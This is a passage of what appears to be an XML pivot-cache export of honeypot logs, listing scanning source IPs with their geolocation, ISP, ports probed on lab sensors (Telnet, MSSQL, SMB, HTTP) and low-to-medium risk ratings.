    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;13129&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Din Daeng"/>
    <s v="Din Daeng"/>
    <s v="6694101"/>
    <s v="NA"/>
    <s v="13.7967"/>
    <s v="100.574"/>
    <s v="7470"/>
    <s v="TRUE INTERNET CORPORATION CO. LTD."/>
    <s v="True Internet Co., Ltd."/>
    <s v="business"/>
    <s v="TRUE"/>
    <s v="2011-03-07"/>
    <s v="TRUE-Consumer"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ab67:a7a6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1693"/>
    <x v="1693"/>
    <s v="syn-045-037-011-119.res.spectrum.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T08:10:53"/>
    <d v="2025-03-12T22:35:16"/>
    <d v="2025-04-15T08:10:53"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H3"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NC"/>
    <s v="North Carolina"/>
    <s v="Johnston"/>
    <s v="Benson"/>
    <s v="4454971"/>
    <s v="27504"/>
    <s v="35.4554"/>
    <s v="-78.5238"/>
    <s v="11426"/>
    <s v="Charter Communications Inc"/>
    <s v="Charter Communications Inc"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d25:b77"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1694"/>
    <x v="1694"/>
    <s v="NA&amp;&amp;114-35-78-230.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-15T08:10:28"/>
    <d v="2024-08-29T03:34:05"/>
    <d v="2025-04-15T08:10:28"/>
    <n v="490"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_REDIS_H1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;32835&amp;&amp;6379&amp;&amp;23&amp;&amp;9100&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GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:4ee6"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1695"/>
    <x v="1695"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T07:55:01"/>
    <d v="2025-02-23T00:17:24"/>
    <d v="2025-04-15T07:55:01"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f4:94a2"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1696"/>
    <x v="1696"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T07:53:15"/>
    <d v="2024-12-13T23:56:23"/>
    <d v="2025-04-15T07:53:15"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="SU"/>
    <s v="North Sumatra"/>
    <s v="Kota Gunungsitoli"/>
    <s v="Gunungsitoli"/>
    <s v="1215102"/>
    <s v="NA"/>
    <s v="1.35993"/>
    <s v="97.5682"/>
    <s v="142345"/>
    <s v="PT Digital Gemilang Solusi"/>
    <s v="DGSNET"/>
    <s v="business"/>
    <s v="PT Digital Gemilang Solusi"/>
    <s v="2021-06-28"/>
    <s v="IDNIC-DGSNET-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.169.43.186,57733)}&amp;&amp;{Data_SMB:Incoming connection (103.169.43.186,58542)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.169.43.186,61593)}&amp;&amp;{Data_SMB:Incoming connection (103.169.43.186,61787)}&amp;&amp;{Data_SMB:Incoming connection (103.169.43.186,51204)}&amp;&amp;{Data_SMB:Incoming connection (103.169.43.186,51770)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a9:2bba"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1697"/>
    <x v="1697"/>
    <s v="59-126-248-195.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T07:50:07"/>
    <d v="2024-03-15T14:58:56"/>
    <d v="2025-04-15T07:50:07"/>
    <n v="768"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;49269&amp;&amp;23&amp;&amp;80&amp;&amp;10459&amp;&amp;NA"/>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login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:3b7e:f8c3"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1698"/>
    <x v="1698"/>
    <s v="FL1-219-107-77-111.aic.mesh.ad.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T07:28:27"/>
    <d v="2025-04-13T09:53:14"/>
    <d v="2025-04-15T07:28:27"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda"/>
    <s v="11749713"/>
    <s v="100-8111"/>
    <s v="35.6916"/>
    <s v="139.768"/>
    <s v="2518"/>
    <s v="BIGLOBE Inc."/>
    <s v="BIGLOBE Inc."/>
    <s v="business"/>
    <s v="BIGLOBE"/>
    <s v="2002-03-07"/>
    <s v="JPNIC-NET-JP"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:db6b:4d6f"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1699"/>
    <x v="1699"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T07:19:22"/>
    <d v="2025-01-13T16:55:26"/>
    <d v="2025-04-15T07:19:22"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;46923"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Jeongja-dong)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3644"/>
    <s v="127.116"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="2007-08-03"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:762f:8b63"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1700"/>
    <x v="1700"/>
    <s v="NA&amp;&amp;220-135-36-28.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-15T07:10:11"/>
    <d v="2024-04-10T10:39:00"/>
    <d v="2025-04-15T07:10:11"/>
    <n v="407"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;38669&amp;&amp;23&amp;&amp;80&amp;&amp;9100&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc87:241c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1701"/>
    <x v="1701"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T07:04:01"/>
    <d v="2025-04-15T07:04:01"/>
    <d v="2025-04-15T07:04:01"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="DZ"/>
    <s v="Algeria"/>
    <s v="16"/>
    <s v="Algiers"/>
    <s v="Sidi M'hamed"/>
    <s v="Sidi M'Hamed"/>
    <s v="12953187"/>
    <s v="NA"/>
    <s v="36.7615"/>
    <s v="3.05662"/>
    <s v="36947"/>
    <s v="ALGTEL-AS"/>
    <s v="new"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9af8:809c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1702"/>
    <x v="1702"/>
    <s v="118-170-196-37.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-15T06:38:25"/>
    <d v="2025-04-15T06:38:25"/>
    <d v="2025-04-15T06:38:25"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET: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76aa:c425"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1703"/>
    <x v="1703"/>
    <s v="NA&amp;&amp;220-133-23-52.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-15T06:12:15"/>
    <d v="2024-06-20T20:58:54"/>
    <d v="2025-04-15T06:12:15"/>
    <n v="458"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H44&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_DNS_H8&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;389&amp;&amp;5900&amp;&amp;53&amp;&amp;6379&amp;&amp;37055&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;18545&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:1734"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1704"/>
    <x v="1704"/>
    <s v="220-132-38-35.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T06:12:14"/>
    <d v="2024-09-11T10:10:00"/>
    <d v="2025-04-15T06:12:14"/>
    <n v="85"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H40"/>
